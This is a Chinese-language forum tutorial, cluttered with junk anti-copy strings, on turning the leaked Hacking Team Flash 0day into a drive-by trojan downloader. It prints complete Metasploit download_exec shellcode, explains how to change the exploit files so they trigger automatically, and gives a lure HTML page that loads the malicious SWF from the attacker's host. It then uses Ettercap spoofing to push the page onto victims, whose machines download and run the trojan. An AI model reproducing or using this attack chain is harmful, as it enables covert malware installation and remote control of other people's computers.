|
, @* X9 l% M: e! r2 Y: a
三、flash 0day之手工代码修改制作下载者实例入侵演示 - G9 |- a2 ~- s0 T" r/ d6 y
! A7 k! x( s! M5 w( B
0 V, y' _4 I2 f( q7 {1 f+ b, B4 l 利用到的工具: : M9 Y P6 t Q" \4 D
$ A$ Z7 k$ A; R, q
. d% O% R+ T: n Msf ) M% d1 F7 B; ?. p: a
2 ^- j9 b2 ]/ h- [7 |
N, U4 G2 C Q- i" g- C Ettercap
' Q: B) g0 Z A
& a+ a( A- w1 f$ I+ ^( D) A- H/ g- \, Z) f; u
Adobe Flash CS6 1 m2 q4 B$ ]$ P/ @% I8 i, n2 l3 y* e5 o
! {: G j' ]/ p& q* t
! \8 a$ ^9 }& `8 P* ?2 x Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 5 ^3 d; C Y+ |7 ?0 W, ~5 [
. k# g+ r* h: t0 M7 T/ G3 E! h W! }( l
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
) F7 ?) o% r. V7 }/ d 6 R9 L+ H, N& \
+ `( f L! a. N: Q; B1 u0 {7 O2 R
如图:
- K* C: s* S2 K! X- W8 o5 N
( z9 K0 E+ X! h* a' y2 M1 D: z8 T+ z
1 q1 g7 n7 Y- }: \+ d
% W. s1 U; y* _ x2 }& d
; X( z c& k$ y2 h2 y* F
" x) }8 l) f6 }! f' d
9 V. x- o$ v, w" c+ Y& \ 3 R3 l2 k# @6 t. K) ^5 I
* l/ H* q. Y1 Z) Z 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: % r! d/ W ]( D+ L- ]% W! x% F$ b
% e. j0 w# F3 C$ R3 O' g: s. x# t, i
- O" a1 E" \& m! ~9 b
. I+ m8 Y" R1 z" @2 v1 r! a
4 E; E, ?' }1 j s/ I8 ]
% N# l% l) w. z% x4 n: y$ l) d3 L
* }) k2 ~3 c9 Z; m1 h
* H5 N9 ?+ h4 |& p3 H2 t4 G" ~ 然后执行generate -t dword生成shellcode,如下: 1 v+ b% R2 E. e, W' H b
, b$ ~; Z* y, H& b5 F
& K; z4 s* d$ K* y# x/ m
4 L }/ C4 _" C/ d" @4 K9 i1 |7 w
; y6 B) J4 u7 ~/ O! o: f$ V _
5 l/ ?) x; {4 Y9 j* \ 复制代码到文本下便于我们一会编辑flash exp,如下:
3 s+ e' R: u. K. S( _
0 ]( p. M7 J( F* t0 k0 w1 P# z; O" f$ V1 p6 E4 {# p6 R
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, + _. o9 f) Q) _- F& y8 ]4 [
- y( r$ N2 n8 p5 P/ ~5 V; G
* H8 s4 ^% j6 F) C 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
7 @7 z6 O; q0 o9 F; X/ o h7 B2 e7 n3 S& {
% z& U! ?0 R* w6 q. A+ \: \& v 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
' p- i V! b2 B* m/ \/ B
9 ]% T: [. i8 s; i" ^/ Z3 F2 E" ]% |1 R4 _$ o
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
$ C: c8 e2 H1 ^0 z5 j0 z+ s
/ D; R7 t3 q4 z( N/ \9 x' F X- `4 o1 F% [
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
! Q6 W2 t: s- T* j4 K2 r , g, F6 x: j1 V( [
9 V8 k o6 M( o) U; Y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
, G7 @1 M6 ~9 C7 E4 a9 G
: c: p) r& h: a6 B- R
; S9 l% u" c- R4 r) ?+ p 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
. ?& ?: q" G# W+ b! e
$ a' O* o+ o4 k. f" P" S5 [
$ |$ p+ \8 C! i9 p! | 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
2 v. }# E, B, a& A0 m7 J
0 N6 _4 J1 B4 x, M5 l
% `5 r% t! U; O' b 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
% p* l/ ^( c- M# E $ ?! }# p: H6 g' ?& Q) J
" M7 R" ^5 G( d, S" v& L* Z. U* m4 O 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
b$ a: w3 N" r' H3 \9 O4 o3 H
+ f. N+ V+ E- [# Z" w i( `& l0 W$ E* W
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, % E( s" v6 ], q
# \$ _- [& Z' l v2 ?7 A$ @! {! d
6 Y% f- F; _, n
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
. y3 q7 g! p4 q" @8 m9 M& D . U; @, m* t& z* T9 v/ l- V, k
7 Z O8 P; Q# ^( m7 H
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 3 b/ H# v+ q! C/ g O* ~2 m
4 N1 f) m/ k; J+ x
) |% W, u# t# t7 d) t$ \ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
3 z C/ ^5 I$ o- u8 q d; n) f' T" P% \5 z3 H4 R
' S' R, `0 W, r# \6 X
* {' X$ i! t& ?' y% |6 }5 B
' o+ `( F+ o1 S" ^& V; i: L$ z
' T4 w' o. c# Y! W1 M
- l: l( T6 A$ R- W
( D0 j' @8 T% j/ I2 q2 E T6 T
0 C; }3 a3 h: y: ~( ` K+ P 下面我们来修改flash 0day exp,需要修改三个文件,分别为: " X. L( h$ v: E ^; p) S) C
! t/ k' c0 I9 p {8 E" E+ F
& O& o/ T7 Z2 z, D' W: | @; |& c# q
$ x7 b5 ]% t- T1 H& P9 y4 J
4 \5 U- @5 N2 w# h( q5 C1 z5 c
9 ^' z9 P* b- j6 ?/ z; ?: J9 T 先修改ShellWin32.as,部分源代码如图:
1 J- L! B6 Q y" r; d- ]; c
0 w! g5 q5 y [7 T( c( B
9 [& ]% u3 Z: U4 {7 U 5 b# P, T' }2 a# e' @( C3 q
- n$ a& p9 E8 C" u7 d1 k$ X5 t5 X
) K9 J- U% O. P4 X1 z6 u
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 1 ?) |. _* I% x$ J
3 }4 ~# L0 s2 w3 @+ R. u6 ^- @5 L
9 A0 x& l- V9 h1 p% X; S& N3 u& K
1 T) B2 i7 z6 D+ D
& B( P/ d3 t$ W' M+ G4 x
: [; x3 ^7 K. }( B9 T 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
$ j5 x5 r6 w' m( z, l% W( _
# [+ f, Z- q& n Z' x3 K; H8 ?# E+ X% Z5 d
/ _) H. `+ J9 [, @" x
' c6 {+ u) T$ p; q
& U4 S, [( S( k" C 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 5 Q' `- L% ^! c! R4 \2 Y4 p' ~
- b+ _+ b. l" D( _
C. P3 V8 H2 `% `/ ?* Y. ~
# M, T3 s: I" _6 u" o3 j3 b( {5 h , J* b3 ]3 V% X
9 O8 C6 T0 d( d
8 U8 n' r I3 \4 n
: Q0 b5 |6 |* ]; B( |% R1 {; H- z
" v- i. i% i- H. P% d+ |
4 g: W, s+ k* M" {$ V3 O7 J: M8 y
8 R T' E7 E% q
^4 n- m: l3 S9 ^ 然后点保存,下面我们来编译一下,打开 ) M) M# p) C" @
$ Z6 m& f( w$ K0 a/ \ K
' f% N$ D1 n# P: d4 i! i' t. K
exp1.fla然后点文件-发布,看看编译没错误
1 X' r7 X7 h8 g: `: I7 L + U$ J% r1 K: _ C& i% ~) T
& ^9 u8 V/ M; i4 O- y% ~
1 `9 B% s, x6 Y8 V2 l' `- U ( x6 L; y; G0 D$ w$ w
; ?4 o) X1 s" R& J
* l; U& f9 _, f4 |- ^6 D % v& h6 a" R, {
* b5 t, ~' ?3 a) o; G! Y. c8 y
N/ i" n. j1 J9 n% b3 A; _1 Z
: ` C- D. q' p; P; o
m' c, w! a( w9 i2 W1 L( T
* P ?0 A# _6 w L& ]0 ? ) e/ R6 \4 ~! ]
9 J, N7 m) i) M% ^1 d
然后我们把生成的
& B; Y9 o) q# z 5 s" L7 s8 S/ y. d, L
}$ Z6 [9 d( }
exp1.swf丢到kailinux 的/var/www/html下: ~; _. d2 g8 W: m1 o* o; P
& k+ m: s3 n: d: ?
; ^% I e* ^, t/ g3 d 然后把这段代码好好编辑一下
! z; Y' b1 e& l
/ K; @- s9 Q& f; b6 K
, z; z8 Z) k: F7 P) | 3 e: {+ l) ~ l
\; E# p. L8 V; H+ h6 N+ r
5 N$ @* |3 I' @: D % N% b# o; C, b/ [; B) J/ L$ f! X
- R1 I% ~2 g- L }2 ?, w% ?" M1 y/ z# S- C5 M
4 U; M n0 s) D7 b" Q+ I: Q
+ j8 C5 j! q n' l1 W) ]7 Y" ^6 u" E
; a: C' U) ]0 A" M+ |9 b9 M. x9 v % K7 B6 d: a. q' D4 m8 o
+ t* m5 {6 i; r+ \+ `
2 Q* C) ~. d# E# g0 {: S* R7 D 7 v- L# t7 J- e. x2 r; L
+ n) [' k+ p" ~# n) v! Z% R
! w. R. i# u* q1 D$ i8 z& O! i
9 [- X" S7 {2 F. L& p5 }
7 v( j/ h4 @' X* K$ `3 {1 m
( e! |( ^; G& K! }
<!DOCTYPE html> / k. l$ h) P+ X8 m
8 X) d0 C3 ?1 ^' O# D* ]
. G- |; c2 o, C. i <html>
# j4 {1 S8 r# `; G( P5 c, { ( @% F; N* g4 w2 Q4 y1 c. i
# p+ N) ^$ Y% W! }
<head>
' V/ H# G( \3 O; j" }/ t 9 a. p/ Z! y D4 I; ~
( Q! C0 ?5 c0 ]" V, ^ <meta http-equiv="Content-Type" content="text/html; # U4 \6 ?" e3 l2 ]! b0 {/ ~
4 W! E$ p: ~$ F7 \ }# ? F
5 t, {+ x! r2 V! Q
charset=utf-8"/> ' w6 y' C8 w2 z& `9 k
, W2 r1 y+ D; D2 V' @/ S1 e+ w5 U T6 T6 Q
</head> 7 J; h" G2 Y! r" v. N- a3 S9 _$ {
& ~% `/ l) H1 {6 g6 y
/ q1 `2 D& |. q7 }9 U' V. i5 @ <body> $ W" [# r* t' j6 Z7 F; Y
# _$ f9 e6 |2 B& b
2 {. q$ @' R; B2 _( n/ e# J+ d <h2> Please wait, the requested page is loading...</h2> W5 m' ?8 `% T8 I% R0 G! E
3 ?% r& Q, ^7 ~7 m' X
* f6 I* [- E) y, c( }. r <br>
% s5 j$ {) ]& A; a! w
1 n% A- F! X, h3 D$ ^
, Z# E6 B( c4 I( S- s <OBJECT
0 }4 a/ z/ n/ Z & p! B8 D( k( X a% _/ i
! \, l) s3 S4 { classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
( g5 U5 @6 z9 a% C" s1 ]( r
; y6 Z4 U) g% T! _% B0 ?) W q' {
# B7 M" r4 i& C/ j& D% F& C VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
4 ~5 U8 \4 l/ f$ l6 ]
* g8 N1 v/ ~9 d# L/ Y: {7 {3 }' {+ f
3 r) K: k& d1 i) a: P) T% s </body> 9 L* T6 p9 ]. P0 C9 w, L( [! |
* o, S. p7 `/ p0 p
. \: {- r0 T- R6 s4 { <script>
! z* ~, j) \# f8 \( M 3 I) c' T6 s2 J- Y
% L1 R. G4 ]$ M+ c1 f1 l setTimeout(function () { : F& A0 [+ `7 N: j9 s& f
# k* p8 m' Z" H9 Q1 C
: X0 J9 b% _ B2 I( c" }
7 k# j# ]0 A+ g- { / j) c0 U2 }. P2 K2 ?
( X' f4 L% D/ ~; q# r& f6 v( M window.location.reload();
9 L* w) E; X6 | [ V( A _
9 p' C( W" B& y9 K
# k5 S6 F b% _- r }, 10000); - W. |3 d! z F! \
! M. {: d+ q* |8 T( u4 t
( t3 O9 M) U5 x( A2 T# x" }/ y
) C# T8 o& ~- Y: x5 Q, O* ` 2 v# F/ q P9 w: E2 X
6 T: V; i0 @5 L* D
</script> # p3 F5 z- {* B7 Z1 m1 M
7 k& K3 X( u+ r
: m3 T1 g K; ]) |' W </html> ; ^. y1 {# R5 E! h5 H+ U/ c) n$ \
+ Z8 l. O) B8 J9 S
: N3 \4 ~; w4 f2 z6 p ' H3 f* T9 \8 {( ^5 `+ E* f, n
8 x8 X1 P& g% T; ?! W
5 h2 X S6 ~* T% C3 C 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
* z% _0 B( P; Z5 s" E( T
: T3 Y% J4 G. l. h0 f6 F) K, C2 B R& |9 R* L! J: r; ]
/ O' N. d# Y7 t: S. k8 @ 3 Z+ [7 B1 \" { T( v3 c
# A" z( w0 S P
+ X7 g I- B8 [# A% f+ }) G
|0 e7 d% ?* i; d( T/ [2 _
% @% D: `5 u. L" n! O3 b$ n
! g8 i; s c/ @ 5 a8 x% Q# B/ X" B3 H0 L
% u+ n/ |% N8 R8 ? ( o- k, N; Q, r$ ^, W& N
- j" ~4 l& O6 ^( C, }, v/ g# e- m" x
9 m# X# t! A1 R# l: N0 Y; M / ^# f) j0 Y' p( o& T
5 [: R" G- W6 o8 K/ _- s. E4 `
* D( l- G, |/ I# h# ~/ { 下面我们用ettercap欺骗如图:
& w E* D: Y5 s
- B2 ?0 X& o; ^# Y+ F3 }9 |" K6 w: J& I9 T2 U. P
; M9 A8 B( L; s& M- q# k2 k6 q
B, e1 e- @( p' h' Q/ Q$ s' G8 ~2 F1 L) c \3 A- s. I
$ Y l; v' j4 S* f# r0 _4 t: L) Q
5 e" |$ Q, _7 u" V5 l: J0 c5 H$ i8 a E
) i" y# ]4 A3 A' l- b6 \& w# \ 下面我们随便访问个网站看看: $ [: f1 \- c a- f6 Z
, D. ~1 a8 |( l0 x
4 @1 o0 u3 S$ b' j! k( p( g/ S 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 7 P2 s \$ {8 c$ s% }1 \+ B
2 C$ S1 M4 Y2 T* \4 f% f# ~2 l
1 t' }" g) N* j! @/ e4 b
! l! a, x8 E0 p, c/ E
: P- t, G7 W% @/ ~: H/ f$ k: B* G! c5 E* q. ^6 w8 y4 R z- [" M) F
我们看另一台, 6 H! @4 R. j4 W2 d
# p% O S0 g9 ?+ v9 m l
4 O5 h/ Q0 z# S& ?' B 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
8 \2 U6 [& a& j0 X8 L |